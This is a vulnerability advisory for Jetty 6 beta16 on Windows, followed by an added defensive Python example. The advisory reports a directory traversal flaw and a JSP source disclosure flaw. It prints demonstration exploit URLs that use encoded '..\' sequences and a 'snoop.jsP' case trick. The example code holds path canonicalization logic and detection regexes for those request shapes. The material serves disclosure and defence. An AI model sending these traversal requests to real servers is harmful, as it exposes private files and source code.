jetty6 Input Validation Flaws Let Remote Users Traverse the Directory
SecurityTracker Alert ID: 1016168
SecurityTracker URL: http://securitytracker.com/id?1016168
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 29 2006
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
Version(s): 6.0.x (beta16)
Description: Ziv Kamir of GamaSec reported a vulnerability in jetty6. A remote user can view files on the target system.
The software does not properly validate user-supplied input. A remote user can supply a specially crafted request to view files on the target system that are located outside of the document directory. A remote user can also view script source code.
Some demonstration exploit URLs are provided:
http://[target]:8080/test/%2e%2e%5c%2e%2e%5clogs/
http://[target]:8080/test/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/
http://[target]:8080/test/snoop.jsP [notice the capital letter 'P']
The vendor was notified on May 15, 2006.
Impact: A remote user can view files on the target system.
Solution: No solution was available at the time of this entry.
Vendor URL: jetty.mortbay.org/jetty6/
Cause: Input validation error
Underlying OS: Windows (Any)
Reported By: Gama Sec <gs_lab@yahoo.com>
Message History:
None.
Source Message Contents
Date: Sun, 28 May 2006 13:53:11 -0700 (PDT)
From: Gama Sec <gs_lab@yahoo.com>
Subject: Jetty
Jetty
28/05/06
========================================
GamaSec - explore your vulnerabilities
========================================
==> Scan Your Web-site With GamaScan <==
-------------------------------------------------------
Application: Jetty web server
Web Site: jetty.mortbay.org/jetty6/
Versions: 6.0.x (beta16)
Platform: Windows
Credits:
########
##########################################
# == Ziv Kamir == #
# #
# GamaSec - explore your vulnerabilities #
# #
# Web : www.gamasec.com #
# #
# #
##########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
jetty6 is a new implementation of the popular Jetty HTTP Server and Servlet Container.
======
2) Bug
======
1.) A remote user can view files on the system located outside of the web document directory.
2.) The server discloses script source code to remote users.
===========
3) The Code
===========
http://[Target]:8080/test/%2e%2e%5c%2e%2e%5clogs/
http://[Target]:8080/test/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/
http://[Target]:8080/test/snoop.jsP (==> 'P')
===========
4) The Fix
===========
Date of Vendor Notification:
15/05/06
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages.
==============================================================================================
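The two request shapes in the description and in the "Bug" and "The Code" sections above come down to one input-validation problem: the path is checked before percent-decoding and before Windows treats `\` (`%5c`) as a separator, and the static-file handler compares the `.jsp` extension with exact case while the Windows filesystem does not. The following is an added example, not Jetty's code: a hardened path canonicalizer and extension classifier that a servlet container would need in front of its file serving, plus a small detector for these request shapes in access logs. The document root is not needed because the check is purely on the path; the log lines are constructed for the example, and the reading that the capital 'P' defeats an exact-case servlet mapping over a case-insensitive filesystem is an assumption (the advisory does not say why it works).

```python
"""Added example (not Jetty's code): hardened handling of the two request
classes in this advisory, plus a detector for them in access-log lines.
The sample log lines below are constructed for the example."""
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Extensions that belong to a servlet; a static-file handler must never
# serve them, whatever the letter case of the request. On Windows the
# filesystem is case-insensitive, so snoop.jsP opens the same file as
# snoop.jsp (assumed cause of the capital-P case in the advisory).
SERVLET_EXTENSIONS = {".jsp", ".jspx"}


def canonicalize(raw_path: str) -> Optional[str]:
    """Decode once, treat '\\' as a separator, collapse dot segments.
    Returns the canonical path, or None if the request climbs above the
    server root (what the %2e%2e%5c sequences try to do)."""
    decoded = unquote(raw_path)
    if "%" in decoded or "\x00" in decoded:
        return None          # double-encoding or NUL byte: refuse, never decode twice
    segments: List[str] = []
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None  # would leave the root
            segments.pop()
        else:
            segments.append(seg)
    return "/" + "/".join(segments)


def classify(raw_path: str) -> str:
    """'reject' for traversal, 'servlet' for JSP-family files in any letter
    case (so the static handler never discloses their source), 'static'
    for everything else."""
    path = canonicalize(raw_path)
    if path is None:
        return "reject"
    if posixpath.splitext(path)[1].lower() in SERVLET_EXTENSIONS:
        return "servlet"
    return "static"


# Detection side: an encoded or literal dot-dot followed by an encoded or
# literal separator, and a JSP extension whose case differs from lowercase.
TRAVERSAL_RE = re.compile(r"(?:%2e|\.){2}(?:%5c|\\|%2f|/)", re.IGNORECASE)
JSP_CASE_RE = re.compile(r"\.(jsp|jspx)(?:\?|$)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def suspicious(log_line: str) -> Optional[str]:
    """Return a reason if a Common Log Format line shows one of the two
    request shapes from the advisory, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = m.group(1)
    if TRAVERSAL_RE.search(target):
        return "encoded dot-dot traversal"
    ext = JSP_CASE_RE.search(target)
    if ext and ext.group(1) != ext.group(1).lower():
        return "case-variant JSP extension"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Index and reason for every flagged line."""
    hits = []
    for i, line in enumerate(lines):
        reason = suspicious(line)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed access-log lines (not from the advisory's target).
SAMPLE_LOG = [
    '10.0.0.5 - - [28/May/2006:13:53:11 -0700] "GET /test/%2e%2e%5c%2e%2e%5clogs/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [28/May/2006:13:53:12 -0700] "GET /test/snoop.jsP HTTP/1.1" 200 2048',
    '10.0.0.9 - - [28/May/2006:13:54:00 -0700] "GET /test/snoop.jsp HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for req in ("/test/%2e%2e%5c%2e%2e%5clogs/", "/test/snoop.jsP", "/test/index.html"):
        print(req, "->", classify(req))
    print(scan(SAMPLE_LOG))
```

The check is deliberately reject-not-clamp: `posixpath.normpath` would silently turn `/../../logs` into `/logs`, which hides the probe; returning None lets the server answer 400 and log it. The `%` test after a single decode refuses double-encoded variants rather than decoding again, which is the other classic way a path check and the filesystem end up disagreeing.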